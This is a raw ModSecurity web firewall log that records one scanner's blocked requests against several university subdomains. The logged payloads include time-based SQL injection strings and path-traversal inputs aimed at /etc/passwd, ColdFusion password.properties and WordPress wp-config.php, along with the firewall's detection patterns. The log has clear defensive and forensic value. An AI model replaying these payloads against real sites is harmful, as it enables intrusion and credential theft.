[Tue Aug 29 11:43:28.635534 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAdSZUcAAAAX"]
[Tue Aug 29 11:43:29.412550 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAcvBp0AAAAJ"]
[Tue Aug 29 11:43:29.506996 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13ccCo-f0AAAe397oAAAAA"]
[Tue Aug 29 11:43:29.518840 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfGaX4AAAAT"]
[Tue Aug 29 11:43:29.538323 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfGaX8AAAAT"]
[Tue Aug 29 11:43:29.545376 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAdTBIkAAAAY"]
[Tue Aug 29 11:43:29.552798 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfFJ@8AAAAR"]
[Tue Aug 29 11:43:30.421398 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAcvBqAAAAAJ"]
[Tue Aug 29 11:43:30.446792 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAdftZYAAAAG"]
[Tue Aug 29 11:43:30.463720 2023] [:error] [pid 1991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13csCo-f0AAAfH1RYAAAAZ"]
[Tue Aug 29 11:43:31.365101 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAARpg8kAAAAU"]
[Tue Aug 29 11:43:31.383133 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfFJ-IAAAAR"]
[Tue Aug 29 11:43:31.385318 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAdb7p4AAAAb"]
[Tue Aug 29 11:43:31.406120 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAdb7p8AAAAb"]
[Tue Aug 29 11:43:31.415805 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAARpg8sAAAAU"]
[Tue Aug 29 11:43:31.416391 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfGaYMAAAAT"]
[Tue Aug 29 11:43:31.428697 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfFJ-QAAAAR"]
[Tue Aug 29 11:43:31.511466 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfAOaMAAAAH"]
[Tue Aug 29 11:43:31.511475 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfGaYQAAAAT"]
[Tue Aug 29 11:43:31.615277 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13c8Co-f0AAAfGaYYAAAAT"]
[Tue Aug 29 11:43:32.403516 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13dMCo-f0AAAdxUW0AAAAC"]
[Tue Aug 29 11:43:36.377648 2023] [:error] [pid 1994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAfK-C0AAAAW"]
[Tue Aug 29 11:43:36.377661 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAdxUXcAAAAC"]
[Tue Aug 29 11:43:36.381733 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAdeQ50AAAAQ"]
[Tue Aug 29 11:43:36.386683 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAe1ehoAAAAB"]
[Tue Aug 29 11:43:36.440129 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAARpg9UAAAAU"]
[Tue Aug 29 11:43:37.407556 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAcsLMEAAAAE"]
[Tue Aug 29 11:43:37.424515 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAeAW9UAAAAu"]
[Tue Aug 29 11:43:37.435300 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAdSZWAAAAAX"]
[Tue Aug 29 11:43:37.445435 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAe399IAAAAA"]
[Tue Aug 29 11:43:37.456224 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAARpg9kAAAAU"]
[Tue Aug 29 11:43:37.463272 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ecCo-f0AAAe1eh0AAAAB"]
[Tue Aug 29 11:43:38.382460 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13esCo-f0AAAe8l18AAAAF"]
